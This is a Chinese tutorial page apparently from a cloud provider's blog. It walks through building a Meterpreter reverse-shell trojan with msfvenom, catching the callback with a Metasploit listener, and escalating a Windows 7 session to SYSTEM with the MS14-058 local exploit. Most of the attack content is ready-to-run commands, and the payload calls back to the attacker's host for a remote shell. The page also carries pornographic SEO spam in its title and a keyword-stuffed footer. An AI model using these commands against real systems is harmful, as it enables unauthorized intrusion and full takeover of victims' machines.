91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

大數據內網滲透中如何利用提權漏洞提升權限

發布時間:2021-12-10 09:25:06 來源:億速云 閱讀:120 作者:柒染 欄目:大數據

這篇文章給大家介紹大數據內網滲透中如何利用提權漏洞提升權限,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

環境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

一、生成木馬

1、查看Windows下可利用的payloads

msfvenom -l payloads | grep windows | grep tcp

大數據內網滲透中如何利用提權漏洞提升權限

2、選擇windows/meterpreter/reverse_tcp并生成木馬

-p 選擇一個payload

-l 載荷列表

-f 生成的文件格式

-e 編碼方式

-i 編碼次數

-b 在生成的程序中避免出現的值

-x 允許我們指定一個自定義的可執行文件作為模板,也就是將木馬捆綁到這個可執行文件上

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe

大數據內網滲透中如何利用提權漏洞提升權限

3、/root目錄下會生成一個aiyou.exe文件

大數據內網滲透中如何利用提權漏洞提升權限

二、通過Metasploit監聽小受

1、啟動Metasploit,use exploit/multi/handler

2、設置payload,set payload windows/meterpreter/reverse_tcp

3、設置監聽,set lhost 192.168.1.133

4、設置監聽端口,set lport 4444

5、run

大數據內網滲透中如何利用提權漏洞提升權限

6、將生成的aiyou.exe拷貝到小受中并運行,getuid查看權限,普通用戶

大數據內網滲透中如何利用提權漏洞提升權限

三、提權漏洞(ms14_058)

1、選擇提權漏洞:use exploit/windows/local/ms14_058_track_popup_menu

2、查看需要設置的參數:show options

大數據內網滲透中如何利用提權漏洞提升權限

3、設置session值:set session 1,執行run

大數據內網滲透中如何利用提權漏洞提升權限

4、重新生成一個session,查看權限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

關于大數據內網滲透中如何利用提權漏洞提升權限就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

莱芜市| 温州市| 岢岚县| 横山县| 加查县| 大英县| 河池市| 临颍县| 许昌县| 长岭县| 昌图县| 甘洛县| 安顺市| 永嘉县| 仪陇县| 交口县| 横山县| 家居| 临朐县| 康乐县| 铅山县| 宜城市| 出国| 古交市| 平湖市| 缙云县| 万载县| 新乡县| 新疆| 苍山县| 措美县| 阿克苏市| 衡东县| 绍兴县| 贺州市| 嵊泗县| 永宁县| 德惠市| 岗巴县| 奇台县| 常宁市|